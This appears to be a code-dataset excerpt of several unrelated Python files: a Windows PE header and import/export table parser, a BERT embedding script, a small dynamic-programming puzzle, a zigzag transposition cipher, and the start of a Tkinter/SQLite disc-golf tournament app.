format_string(\"Section Headers\", 0)\n\n for i in range(len(section_headers)):\n output += section_headers[i].write()\n\n return output\n\n#merges output for import direcotries\ndef imports_merge(import_direct, data, num_of_sections, pe_header_offset, opt_header_size):\n output = format_string(\"Import Table\", 0)\n\n for i in range(len(import_direct)):\n output += import_direct[i].write(data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += \"\\n\"\n\n return output\n\n# array containing full names of fields of the mz header, used names of the fields in the structure and the field 
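# little_endian() in the PE-parser record above is int.from_bytes over a byte
# slice; the standard-library struct module expresses the same little-endian
# field reads declaratively. The byte string below is a made-up example, not a
# real PE header:
import struct

data = bytes([0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00])
magic, = struct.unpack_from("<H", data, 0)  # 2-byte little-endian field
word, = struct.unpack_from("<I", data, 2)   # 4-byte little-endian field
print(hex(magic))                                   # 0x5a4d ("MZ")
print(word == int.from_bytes(data[2:6], "little"))  # True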
size in bytes\nmz_param = [\n (\"Magic\", \"magic\", 2),\n (\"Bytes on Last Page of File\", \"last_page_bytes\", 2),\n (\"Pages in File\", \"pages_in_file\", 2),\n (\"Relocations\", \"relocations\", 2),\n (\"Size of Header in Paragraphs\", \"size_of_header_in_paragraphs\", 2),\n (\"Minimum Extra Paragraphs\", \"min_extra_par\", 2),\n (\"Maximum Extra Paragraphs\", \"max_extra_par\", 2),\n (\"Initial (relative) SS\", \"initial_SS\", 2),\n (\"Initial SP\", \"initial_SP\", 2),\n (\"Checksum\", \"checksum\", 2),\n (\"Initial IP\", \"initial_IP\", 2),\n (\"Initial (relative) CS\", \"initial_CS\", 2),\n (\"Offset to Relocation Table\", \"offset_relocation\", 2),\n (\"Overlay Number\", \"overlay_num\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"OEM Identifier\", \"OEM_ident\", 2),\n (\"OEM Information\", \"OEM_info\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Offset to New Header\", \"new_header_offset\", 4)\n\n]\n\n# array containing full names of fields of the pe header, used names of the fields in the structure and the field size in bytes\npe_param = [\n (\"Magic\", \"magic\", 4),\n (\"Machine\", \"machine\", 2),\n (\"Number of Sections\", \"num_of_sections\", 2),\n (\"Time Date Stamp\", \"time_date_stamp\", 4),\n (\"Pointer to Symbol Table\", \"pointer_to_symbol\", 4),\n (\"Number of Symbols\", \"num_of_symbols\", 4),\n (\"Size of Optional Header\", \"size_of_opt_header\", 2),\n (\"Characteristics\", \"characteristics\", 2),\n\n]\n\n# array containing full names of fields of the optional header, used names of the fields in the structure and the field size in bytes\noptional_param = [\n (\"Magic\", \"magic\", 2),\n (\"Major Linker Version\", \"maj_link_version\", 1),\n (\"Minor Linker Version\", \"min_link_verion\", 1),\n (\"Size of Code\", \"size_of_code\", 4),\n (\"Size of Initialized Data\", \"size_init_data\", 4),\n (\"Size of Uninitialized Data\", \"size_uninit_data\", 4),\n (\"Address of Entry Point\", \"addr_entry\", 4),\n (\"Base of Code\", \"base_code\", 4),\n (\"Base of Data\", \"base_data\", 4),\n (\"Image Base\", \"image_base\", 4),\n (\"Section Alignment\", \"sect_align\", 4),\n (\"File Alignment\", \"file_align\", 4),\n (\"Major O/S Version\", \"maj_os_ver\", 2),\n (\"Minor O/S Version\", \"min_os_ver\", 2),\n (\"Major Image Version\", \"maj_img_ver\", 2),\n (\"Minor Image Version\", \"min_img_ver\", 2),\n (\"Major Subsystem Version\", \"maj_subsys_ver\", 2),\n (\"Minor Subsystem Version\", \"min_subsys_ver\", 2),\n (\"Win32 Version Value\", \"win32_ver\", 4),\n (\"Size of Image\", \"size_img\", 4),\n (\"Size of Headers\", \"size_headers\", 4),\n (\"Checksum\", \"checksum\", 4),\n (\"Subsystem\", \"subsys\", 2),\n (\"DLL Characteristics\", \"dll_char\", 2),\n (\"Size of Stack Reserve\", \"size_stack_res\", 4),\n (\"Size of Stack Commit\", \"size_stack_comm\", 4),\n (\"Size of Heap Reserve\", \"size_heap_res\", 4),\n (\"Size of Heap Commit\", \"size_heap_comm\", 4),\n (\"Loader Flags\", \"loader_flags\", 4),\n (\"Number of Data Directories\", \"num_data_dirs\", 4),\n\n]\n\n# array containing full names of fields of the section header, used names of the fields in the structure and the field size in bytes\nsection_param = [\n (\"Name\", \"name\", 8),\n (\"Virtual Size\", \"virt_size\", 4),\n (\"RVA\", \"rva\", 4),\n (\"Size of Raw Data\", \"size_raw\", 4),\n 
(\"Pointer to Raw Data\", \"pointer_raw\", 4),\n (\"Pointer to Relocations\", \"pointer_reloc\", 4),\n (\"Pointer to Line Numbers\", \"pointer_line_mem\", 4),\n (\"Number of Relocations\", \"num_reloc\", 2),\n (\"Number of Line Numbers\", \"num_line_num\", 2),\n (\"Characteristics\", \"characteristics\", 4)\n\n]\n\n# names of the direcories that are cointained on the end of the optional header (size for every directory is 8 bytes, 4 for the name and 4 for the size)\ndata_dir_names = [\n \"EXPORT Table\",\n \"IMPORT Table\",\n \"RESOURCE Table\",\n \"EXCEPTION Table\",\n \"CERTIFICATE Table\",\n \"BASE RELOCATION Table\",\n \"DEBUG Directory\",\n \"ARCHITECTURE SPECIFIC Data\",\n \"GLOBAL POINTER Register\",\n \"TLS Table\",\n \"LOAD CONFIG Table\",\n \"BOUND Import\",\n \"IMPORT ADRESS Table\",\n \"DELAY IMPORT Descriptor\",\n \"CLI Header\",\n \"RESERVED\"\n]\n\n#names of the atributes that are cointained in the import directory, variable names for that attributes and their size\nimport_table_names = [(\"Import Lookup Table RVA\", \"import_lookup_rva\", 4),\n (\"Time/Date Stamp\", \"stamp\", 4),\n (\"Forwarder Chain\", \"chain\", 4),\n (\"Name RVA\", \"name_rva\", 4),\n (\"Import Address Table RVA\", \"import_addr_rva\", 4),\n ]\n\n#names of the atributes that are cointained in the export directory, variable names for that attributes and their size\nexport_table_names=[(\"Characteristics\",\"characteristics\",4),\n (\"Time Date Stamp\",\"time_date_stamp\",4),\n (\"Major Version\",\"maj_version\",2),\n (\"Minor Version\",\"min_version\",2),\n (\"Name RVA\",\"name_rva\",4),\n (\"Ordinal Base\",\"ordinal_base\",4),\n (\"Number of Functions\",\"num_of_functions\",4),\n (\"Number of Names\",\"num_of_names\",4),\n (\"Address Table RVA\",\"addr_table_rva\",4),\n (\"Name Pointer Table RVA\",\"name_pointer_rva\",4),\n (\"Ordinal Table RVA\",\"ordinal_table_rva\",4)]\n\n# costum structure that consists of relative virtual address of a data directory and the size of it\n# this is used in the initialising of the optional header\nclass data_dir:\n def __init__(self, rva, size):\n self.rva = rva\n self.size = size\n\n\n# mz header structure\nclass MZ_header:\n def __init__(self, data, pointer):\n self.magic = little_endian(data, pointer, BYTES_2)\n self.last_page_bytes = little_endian(data, pointer + 2, BYTES_2)\n self.pages_in_file = little_endian(data, pointer + 4, BYTES_2)\n self.relocations = little_endian(data, pointer + 6, BYTES_2)\n self.size_of_header_in_paragraphs = little_endian(data, pointer + 8, BYTES_2)\n self.min_extra_par = little_endian(data, pointer + 10, BYTES_2)\n self.max_extra_par = little_endian(data, pointer + 12, BYTES_2)\n self.initial_SS = little_endian(data, pointer + 14, BYTES_2)\n self.initial_SP = little_endian(data, pointer + 16, BYTES_2)\n self.checksum = little_endian(data, pointer + 18, BYTES_2)\n self.initial_IP = little_endian(data, pointer + 20, BYTES_2)\n self.initial_CS = little_endian(data, pointer + 22, BYTES_2)\n self.offset_relocation = little_endian(data, pointer + 24, BYTES_2)\n self.overlay_num = little_endian(data, pointer + 26, BYTES_2)\n self.OEM_ident = little_endian(data, pointer + 38, BYTES_2)\n self.OEM_info = little_endian(data, pointer + 40, BYTES_2)\n self.new_header_offset = little_endian(data, pointer + 60, BYTES_4)\n\n # checking if the magic numbers are correct\n def check(self):\n if self.magic != int.from_bytes(b'MZ', \"little\"):\n error_wrong_format()\n\n # formatted output for every part of the mz header returned as a string\n def 
write(self):\n output = format_string(\"MZ HEADER\", 0)\n elements = vars(self)\n header_name = \"--> MZ\"\n reserved = '{: <5}{: <30}: {: <10}\\n'.format(\"\", \"reserved\",\n add_padding_str(0, BYTES_2))\n for i in range(14):\n name_of_atribute = mz_param[i][0]\n name_of_variable = mz_param[i][1]\n size = mz_param[i][2]\n\n if name_of_variable != \"magic\":\n header_name = \"\"\n\n output += '{: <5}{: <30}: {: <10}{}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable], size),\n header_name)\n\n for i in range(4):\n output += reserved\n\n for i in range(18, 20):\n name_of_atribute = mz_param[i][0]\n name_of_variable = mz_param[i][1]\n size = mz_param[i][2]\n\n output += '{: <5}{: <30}: {: <10}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable],size))\n\n for i in range(10):\n output += reserved\n\n name_of_atribute = mz_param[30][0]\n name_of_variable = mz_param[30][1]\n size = mz_param[30][2]\n output += '{: <5}{: <30}: {: <10}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable], size))\n output += \"\\n\"\n\n return output\n\n\n# pe header structure\nclass PE_header:\n def __init__(self,data, pointer):\n self.magic = little_endian(data, pointer, BYTES_4)\n self.machine = little_endian(data, pointer + 4, BYTES_2)\n self.num_of_sections = little_endian(data, pointer + 6, BYTES_2)\n self.time_date_stamp = little_endian(data, pointer + 8, BYTES_4)\n self.pointer_to_symbol = little_endian(data, pointer + 12, BYTES_4)\n self.num_of_symbols = little_endian(data, pointer + 16, BYTES_4)\n self.size_of_opt_header = little_endian(data, pointer + 20, BYTES_2)\n self.characteristics = little_endian(data, pointer + 22, BYTES_2)\n\n # checking if the magic numbers are correct\n def check(self):\n if self.magic != int.from_bytes(b'\\x50\\x45\\x00\\x00', \"little\"):\n error_wrong_format()\n\n # formated output for every part of the pe header returned as a string\n def write(self):\n output = format_string(\"PE header\", 0)\n elements = vars(self)\n header_name = \"--> PE\"\n\n for i in range(len(elements)):\n name_of_atribute = pe_param[i][0]\n name_of_variable = pe_param[i][1]\n size = pe_param[i][2]\n\n if name_of_variable != \"magic\":\n header_name = \"\"\n\n output += '{: <5}{: <30}: {: <10} {}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable],size),\n header_name)\n\n output += \"\\n\"\n\n return output\n\n\n# optional header structure\nclass Optional_header:\n def __init__(self, data, pointer):\n self.magic = little_endian(data, pointer, BYTES_2)\n self.maj_link_version = little_endian(data, pointer + 2, BYTES_1)\n self.min_link_verion = little_endian(data, pointer + 3, BYTES_1)\n self.size_of_code = little_endian(data, pointer + 4, BYTES_4)\n self.size_init_data = little_endian(data, pointer + 8, BYTES_4)\n self.size_uninit_data = little_endian(data, pointer + 12, BYTES_4)\n self.addr_entry = little_endian(data, pointer + 16, BYTES_4)\n self.base_code = little_endian(data, pointer + 20, BYTES_4)\n self.base_data = little_endian(data, pointer + 24, BYTES_4)\n self.image_base = little_endian(data, pointer + 28, BYTES_4)\n self.sect_align = little_endian(data, pointer + 32, BYTES_4)\n self.file_align = little_endian(data, pointer + 36, BYTES_4)\n self.maj_os_ver = little_endian(data, pointer + 40, BYTES_2)\n self.min_os_ver = little_endian(data, pointer + 42, BYTES_2)\n self.maj_img_ver = little_endian(data, pointer + 44, BYTES_2)\n self.min_img_ver = little_endian(data, pointer + 46, 
BYTES_2)\n self.maj_subsys_ver = little_endian(data, pointer + 48, BYTES_2)\n self.min_subsys_ver = little_endian(data, pointer + 50, BYTES_2)\n self.win32_ver = little_endian(data, pointer + 52, BYTES_4)\n self.size_img = little_endian(data, pointer + 56, BYTES_4)\n self.size_headers = little_endian(data, pointer + 60, BYTES_4)\n self.checksum = little_endian(data, pointer + 64, BYTES_4)\n self.subsys = little_endian(data, pointer + 68, BYTES_2)\n self.dll_char = little_endian(data, pointer + 70, BYTES_2)\n self.size_stack_res = little_endian(data, pointer + 72, BYTES_4)\n self.size_stack_comm = little_endian(data, pointer + 76, BYTES_4)\n self.size_heap_res = little_endian(data, pointer + 80, BYTES_4)\n self.size_heap_comm = little_endian(data, pointer + 84, BYTES_4)\n self.loader_flags = little_endian(data, pointer + 88, BYTES_4)\n self.num_data_dirs = little_endian(data, pointer + 92, BYTES_4)\n self.tables = return_tables(data, pointer + 96, self.num_data_dirs)\n\n # checking if the magic numbers are correct\n def check(self):\n if self.magic != int.from_bytes(b'\\x0B\\x01', \"little\"):\n error_wrong_format()\n\n # formatted output for every part of the optional header returned as a string\n def write(self, data, num_of_sections, pe_header_offset, opt_header_size):\n output = format_string(\"Optional header\", 0)\n phys_address = \"\"\n elements = vars(self)\n\n for i in range(len(elements) - 1):\n name_of_atribute = optional_param[i][0]\n name_of_variable = optional_param[i][1]\n size = optional_param[i][2]\n\n if name_of_variable == \"addr_entry\":\n phys_address = \"(physical: \" + add_padding_str(RVA_to_offset(data,\n elements[name_of_variable],\n num_of_sections,\n pe_header_offset,\n opt_header_size), size) + \")\"\n\n output += '{: <5}{: <30}: {: <10} {: <25}\\n'.format(\"\", name_of_atribute, add_padding_str(elements[name_of_variable],size), phys_address)\n\n phys_address = \"\"\n\n output += 50 * \"-\" + \"\\n\"\n\n for i in range(len(self.tables)):\n output += '{: <5}{: <10} {: <4} {: <25}\\n'.format(\"\", add_padding_str(self.tables[i].rva, BYTES_4), \"RVA\",\n data_dir_names[i])\n output += '{: <5}{: <10} {: <4}\\n'.format(\"\", add_padding_str(self.tables[i].size, BYTES_4), \"Size\")\n output += 50 * \"-\" + \"\\n\"\n\n output += \"\\n\"\n\n return output\n\n\n# section header structure\nclass Section_header:\n def __init__(self, data, pointer):\n self.name = little_endian(data, pointer, BYTES_8)\n self.virt_size = little_endian(data, pointer + 8, BYTES_4)\n self.rva = little_endian(data, pointer + 12, BYTES_4)\n self.size_raw = little_endian(data, pointer + 16, BYTES_4)\n self.pointer_raw = little_endian(data, pointer + 20, BYTES_4)\n self.pointer_reloc = little_endian(data, pointer + 24, BYTES_4)\n self.pointer_line_mem = little_endian(data, pointer + 28, BYTES_4)\n self.num_reloc = little_endian(data, pointer + 32, BYTES_2)\n self.num_line_num = little_endian(data, pointer + 34, BYTES_2)\n self.characteristics = little_endian(data, pointer + 36, BYTES_4)\n\n # formated output for every part of the section header returned as a string\n def write(self):\n output = \"\"\n elements = vars(self)\n name_str = string_from_int_representation_of_hex(self.name)\n name_of_atribute = section_param[0][0]\n output += '{: <5}{: <25}: {:<8}\\n'.format(\"\", name_of_atribute, name_str)\n\n for i in range(1, len(elements)):\n name_of_atribute = section_param[i][0]\n name_of_variable = section_param[i][1]\n size = section_param[i][2]\n output += '{: <5}{: <25}: {:<10}\\n'.format(\"\", 
name_of_atribute,\n add_padding_str(elements[name_of_variable],\n size))\n\n output += \"\\n\"\n\n return output\n\n\nclass import_directory:\n def __init__(self, data,pointer):\n self.import_lookup_rva = little_endian(data, pointer, BYTES_4)\n self.stamp = little_endian(data, pointer + 4, BYTES_4)\n self.chain = little_endian(data, pointer + 8, BYTES_4)\n self.name_rva = little_endian(data, pointer + 12, BYTES_4)\n self.import_addr_rva = little_endian(data, pointer + 16, BYTES_4)\n\n def write(self, data, num_of_sections, pe_header_offset, opt_header_size):\n output = format_string(\"Import Directory\", 1)\n elements = vars(self)\n\n for i in range(len(elements)):\n phis_addr = \"\"\n name_of_atribute = import_table_names[i][0]\n name_of_variable = import_table_names[i][1]\n size = import_table_names[i][2]\n should_display_phis_addr = name_of_atribute in (\"Import Lookup Table RVA\", \"Name RVA\", \"Import Address Table RVA\") and \\\n elements[name_of_variable] != 0\n\n if should_display_phis_addr:\n phis_addr = \"(phisycal: \" + add_padding_str(RVA_to_offset(data, elements[name_of_variable],\n num_of_sections, pe_header_offset, opt_header_size),size) + \")\"\n\n if name_of_atribute == \"Name RVA\":\n phis_addr += \" --> \" + get_dll_name(self.name_rva, data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += '{}{: <25}: {: <10} {}\\n'.format(INDENT * 2 * \" \", name_of_atribute,add_padding_str(elements[name_of_variable], size), phis_addr)\n\n\n if self.import_lookup_rva == 0:\n return output\n\n output += format_string(\"Import Thunks\", 2)\n\n phis_thunk = RVA_to_offset(data, self.import_lookup_rva, num_of_sections, pe_header_offset, opt_header_size)\n value = little_endian(data, phis_thunk, BYTES_4)\n counter = 0\n\n while value != 0:\n if value & (1 << 31):\n ordinal = value & 0xffff\n output += '{}Api: {:<10} {:<7}: {:<4}\\n'.format(3 * INDENT * \" \", add_padding_str(value, BYTES_4), \"Ordinal\",\n add_padding_str(ordinal, BYTES_2))\n\n else:\n hint = little_endian(data, RVA_to_offset(data, value, num_of_sections, pe_header_offset, opt_header_size), BYTES_2)\n name = get_dll_name(value + 2, data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += '{}Api: {:<10} (physical: {:<10}) --> hint: {:<6}, name: {:<20}\\n'.format(3 * INDENT * \" \",\n add_padding_str(value, BYTES_4),\n add_padding_str(RVA_to_offset(data,\n value,\n num_of_sections,\n pe_header_offset,\n opt_header_size),\n BYTES_4),\n add_padding_str(hint, BYTES_2), name)\n\n counter += 1\n value = little_endian(data, phis_thunk + 4 * counter, BYTES_4)\n\n output += \"\\n\"\n\n return output\n\n\nclass Export_directory:\n def __init__(self, data, pointer):\n self.characteristics = little_endian(data, pointer, BYTES_4)\n self.time_date_stamp = little_endian(data, pointer + 4, BYTES_4)\n self.maj_version = little_endian(data, pointer + 8, BYTES_2)\n self.min_version = little_endian(data, pointer + 10, BYTES_2)\n self.name_rva = little_endian(data, pointer + 12, BYTES_4)\n self.ordinal_base = little_endian(data, pointer + 16, BYTES_4)\n self.num_of_functions = little_endian(data, pointer + 20, BYTES_4)\n self.num_of_names = little_endian(data, pointer + 24, BYTES_4)\n self.addr_table_rva = little_endian(data, pointer + 28, BYTES_4)\n self.name_pointer_rva = little_endian(data, pointer + 32, BYTES_4)\n self.ordinal_table_rva = little_endian(data, pointer + 36, BYTES_4)\n\n def write(self, data,num_of_sections, pe_header_offset, opt_header_size, export_dir):\n output = format_string(\"Export Table\", 
0) + format_string(\"Export Directory\", 1)\n elements = vars(self)\n phis_addr = \"\"\n\n\n for i in range(len(elements)):\n name_of_attribute = export_table_names[i][0]\n name_of_variable = export_table_names[i][1]\n size = export_table_names[i][2]\n\n if name_of_attribute in (\"Name RVA\",\n \"Address Table RVA\",\n \"Name Pointer Table RVA\",\n \"Ordinal Table RVA\"):\n phis_addr = \"(physical: \" + add_padding_str(RVA_to_offset(data, elements[name_of_variable],\n num_of_sections, pe_header_offset, opt_header_size), size) + \")\"\n if export_table_names[i][0] == \"Name RVA\":\n phis_addr += \"--> \" + get_dll_name(self.name_rva, data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += '{}{:<30} {:<10} {}\\n'.format(INDENT * \" \", name_of_attribute,\n add_padding_str(elements[name_of_variable],size),phis_addr)\n phis_addr = \"\"\n\n ordinals = []\n names = []\n output_second = format_string(\"Export Function Name Table\", 2)\n output_third = format_string(\"Export Ordinal Table\", 2)\n\n for i in range(self.num_of_names):\n pointer = little_endian(data, RVA_to_offset(data, self.name_pointer_rva + BYTES_4 * i,\n num_of_sections, pe_header_offset, opt_header_size), BYTES_4)\n name_str = get_dll_name(pointer, data, num_of_sections, pe_header_offset, opt_header_size)\n ordinal=little_endian(data, RVA_to_offset(data, self.ordinal_table_rva + BYTES_2 * i,\n num_of_sections, pe_header_offset, opt_header_size),BYTES_2) + self.ordinal_base\n output_second += '{}API: {: <10} (phisycal: {}) --> Ordinal: {: <6}, Name: {}\\n'.format(INDENT * 3 * \" \",\n add_padding_str(pointer,BYTES_4),\n add_padding_str(RVA_to_offset(\n data,\n pointer,\n num_of_sections,\n pe_header_offset,\n opt_header_size),BYTES_4),\n add_padding_str(ordinal,BYTES_2),name_str)\n output_third += '{}Value: {: <6} (decoded ordinal: {: <6}), Name: {}\\n'.format(INDENT * 3 * \" \",\n add_padding_str(ordinal - self.ordinal_base,BYTES_2),\n add_padding_str(ordinal,BYTES_2),name_str)\n ordinals.append(ordinal)\n names.append((name_str, pointer))\n\n output += \"\\n\" + format_string(\"Export Address Table\", 2)\n\n for i in range(self.num_of_functions):\n ordinal_ordered = self.ordinal_base + i\n address = little_endian(data, RVA_to_offset(data, self.addr_table_rva + BYTES_4 * i,\n num_of_sections, pe_header_offset, opt_header_size), BYTES_4)\n physical = RVA_to_offset(data,address,num_of_sections,pe_header_offset,opt_header_size)\n\n if address == 0:\n output += '{}{: <10} (physical: {: <10})\\n'.format(INDENT * 3 * \" \",add_padding_str(address, BYTES_4), add_padding_str(physical, BYTES_4))\n\n else:\n is_in_export_dir = export_dir.rva <= address <= export_dir.rva + export_dir.size\n\n if is_in_export_dir:\n dll_name = get_dll_name(address, data, num_of_sections, pe_header_offset, opt_header_size)\n\n else:\n if ordinal_ordered not in ordinals:\n dll_name = \"\"\n\n else:\n dll_name = names[ordinals.index(ordinal_ordered)][0]\n\n output += '{}API: {: <10} (physical: {: <10}) --> Ordinal: {: <6}, Name: {}\\n'.format(INDENT * 3 * \" \", add_padding_str(address, BYTES_4),\n add_padding_str(physical, BYTES_4),\n add_padding_str(ordinal_ordered, BYTES_2),\n dll_name)\n\n output += output_second + \"\\n\" + output_third\n\n return output\n\n\nif __name__ == '__main__':\n # variable from where we will print the output\n output = \"\"\n\n # open a file and read the bytes from it\n file_name = input(\"Write PE path:\")\n file = open(file_name, \"rb\")\n data = file.read()\n\n # load the mz header, check if it is correct and 
write it to output\n mz = MZ_header(data, 0)\n mz.check()\n output += mz.write()\n\n # load the pe header, check if it is correct and write it to output\n pe = PE_header(data, mz.new_header_offset)\n pe.check()\n output += pe.write()\n\n # load the optional header, check if it is correct and write it to output\n opt = Optional_header(data, mz.new_header_offset + SIZE_OF_PE)\n opt.check()\n output += opt.write(data, pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header)\n\n #load the section headers and write them to output\n sect = []\n\n for i in range(pe.num_of_sections):\n sect.append(\n Section_header(data, mz.new_header_offset + SIZE_OF_PE + pe.size_of_opt_header + i * SIZE_OF_SECTION_HEADER))\n\n output += section_headers_merge(sect)\n\n # load the imports and write them to output\n import_dirs = []\n imports = opt.tables[1]\n\n for i in range(int(imports.size / SIZE_OF_IMPORT_DIRECTORY)):\n import_dirs.append(import_directory(data, RVA_to_offset(data, imports.rva + i * SIZE_OF_IMPORT_DIRECTORY,\n pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header)))\n\n output += imports_merge(import_dirs, data,pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header)\n\n #load the exports and write them to output\n exports = opt.tables[0]\n\n if exports.size != 0:\n export_dir = Export_directory(data, RVA_to_offset(data, exports.rva, pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header))\n output += export_dir.write(data, pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header, exports)\n\n print(output)\n #write=open(\"out.txt\",\"w\")\n #write.write(output)\n #write.close()\n file.close()\n","repo_name":"facafile/Reverse-Engineering","sub_path":"PE Parser 32bit/PE_Parser.py","file_name":"PE_Parser.py","file_ext":"py","file_size_in_byte":32391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6063404616","text":"import re\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom transformers import BertModel, BertTokenizer\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nVEC_LEN = 768\n\n\nclass v2g_Model(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n self.bert = BertModel.from_pretrained(\"bert-base-uncased\")\n self.w_mu = nn.Linear(VEC_LEN, VEC_LEN)\n self.w_var = nn.Linear(VEC_LEN, VEC_LEN)\n\n def __call__(self, *args, **kwds):\n return super().__call__(*args, **kwds)\n\n def forward(self, input_ids, attention_mask):\n outputs = self.bert(input_ids, attention_mask)\n emb = outputs.last_hidden_state[:, 0]\n var = self.w_var(emb).exp()\n mu = self.w_mu(emb)\n return mu, var\n\n\ntrain_f = open(\"./data/wikisub.txt\")\ntrain_S = train_f.readlines()\ntrain_S = train_S[:5]\ntrain_S_d = []\nfor i in train_S:\n train_S_d.append(i)\n train_S_d.append(i)\n\ntokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\ninputs = tokenizer(train_S_d, padding=True, truncation=True)\ninput_ids = torch.from_numpy(np.array(inputs.input_ids).astype(np.float32)).clone()\ninput_ids = input_ids.to(torch.long)\nattention_mask = torch.from_numpy(np.array(inputs.attention_mask).astype(np.float32)).clone()\nattention_mask = attention_mask.to(torch.long)\nv2g = v2g_Model()\nv2g.eval()\nmu, var = v2g(input_ids, 
attention_mask)\n\nprint(mu)\nprint(var)\n","repo_name":"hpp-playground/python-playground","sub_path":"src/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21874770010","text":"'''\n3\n3\n111\n4\n1101\n5\n11111\n'''\nT = int(input())\nfor tc in range(T):\n input()\n M = list(map(int,list(input())))\n dp = [0]*len(M)\n dp[0] = 1\n for i in range(1,len(M)):\n if M[i] == 1:\n dp[i] = dp[i-1]\n if i-2 >= 0:\n dp[i] += dp[i-2]\n else:\n dp[i] = 0\n print(dp[len(M)-1])","repo_name":"Rekalux/Algorithm-etc","sub_path":"Only Algorithm/Year2021/Day0320/scofe_1.py","file_name":"scofe_1.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24449113388","text":"import numpy as np\nfrom datetime import datetime\n\ndef form_matrix(message : str, route_step : int) -> np.ndarray:\n message_len = len(message)\n if message_len % route_step != 0:\n message += ' ' * (route_step - message_len % route_step)\n matrix = np.array(list(message))\n matrix = matrix.reshape(route_step, -1)\n return matrix\n\ndef encrypt(message : str, route_step : int) -> str:\n matrix = form_matrix(message, route_step)\n print('Таблица:')\n for row in matrix:\n print(row)\n res = ''\n i, j = matrix.shape\n for column in range(j):\n if column % 2 == 0:\n for row in reversed(range(i)):\n res += matrix[row, column]\n else:\n for row in range(i):\n res += matrix[row, column]\n return(res)\n\ndef decrypt(message: str, route_step : int) -> str:\n message_len = len(message)\n if message_len % route_step != 0:\n message += ' ' * (route_step - message_len % route_step)\n matrix = np.empty((route_step, message_len // route_step), dtype=str)\n i, j = matrix.shape\n for column in range(j):\n if column % 2 == 0:\n for row in reversed(range(i)):\n letter = message[0]\n message = message[1:]\n matrix[row, column] = letter\n else:\n for row in (range(i)):\n letter = message[0]\n message = message[1:]\n matrix[row, column] = letter\n print('Таблица:')\n for row in matrix:\n print(row)\n res = ''.join(matrix.ravel())\n return res\n\n# словарь {символ:количество потворений этого символа} отсортированный по ключу\ndef get_letters_amount(seq):\n letters_dictionary = {}\n for i in seq:\n if i.isalpha():\n if i not in letters_dictionary:\n letters_dictionary[i] = 0\n letters_dictionary[i] += 1\n return dict(sorted(letters_dictionary.items()))\n\ndef zigzag_route_cipher(message: str, route_step : int):\n start_time = datetime.now()\n encrypted = encrypt(message, route_step)\n encrypt_time = datetime.now() - start_time\n print('Зашифрованное сообщение', encrypted)\n start_time = datetime.now()\n decrypted = decrypt(encrypted, route_step)\n decrypt_time = datetime.now() - start_time\n print('Расшифрованное сообщение:', decrypted)\n print('Время зашифрования:', encrypt_time)\n print('Время расшифрования:', decrypt_time)\n return get_letters_amount(encrypted)","repo_name":"ne-vera/ZIiNIS-6sem","sub_path":"ЛР 3. 
Шифры перестановки/lab3/zigzag_route_cipher.py","file_name":"zigzag_route_cipher.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3064662623","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.font as font\nfrom PIL import ImageTk\nimport sqlite3\n\n#constants\nbgcolor = \"#34495E\"\n\n#hae turnausten nimet\ndef hae_turnaus():\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(f\"SELECT name FROM Events;\")\n turnaus = cursor.fetchall()\n connection.close()\n return turnaus\n\n#tulosta turnauksen osallistujat\ndef hae_turnaustiedot(nykyvalinta):\n tunnus = (nykyvalinta,)\n query = '''\n SELECT\n Events.ScheduleDate AS Pvm,\n Courses.Name AS Rata,\n Courses.Holecount,\n Players.FirstName AS Etunimi,\n Players.LastName AS Sukunimi,\n Scores.Score AS Pisteet\n FROM\n Events\n INNER JOIN Courses ON Courses.CourseID = Events.CourseID\n INNER JOIN Participants ON Participants.EventID = Events.EventID\n INNER JOIN Players ON Players.PlayerID = Participants.PlayerID\n INNER JOIN Scores ON Scores.PlayerID = Participants.PlayerID\n WHERE Events.Name = ?;\n '''\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query, tunnus)\n osallistujat = cursor.fetchall()\n osallistujat.sort(key = lambda x: x[5], reverse=True)\n connection.close()\n return osallistujat\n\ndef hae_pelaajat():\n query = '''\n SELECT \n *\n FROM\n Players;\n '''\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query)\n osallistujat = cursor.fetchall()\n osallistujat.sort(key = lambda x: x[0])\n connection.close()\n return osallistujat\n\ndef hae_radat():\n query = '''\n SELECT \n *\n FROM\n Courses;\n '''\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query)\n radat = cursor.fetchall()\n radat.sort(key = lambda x: 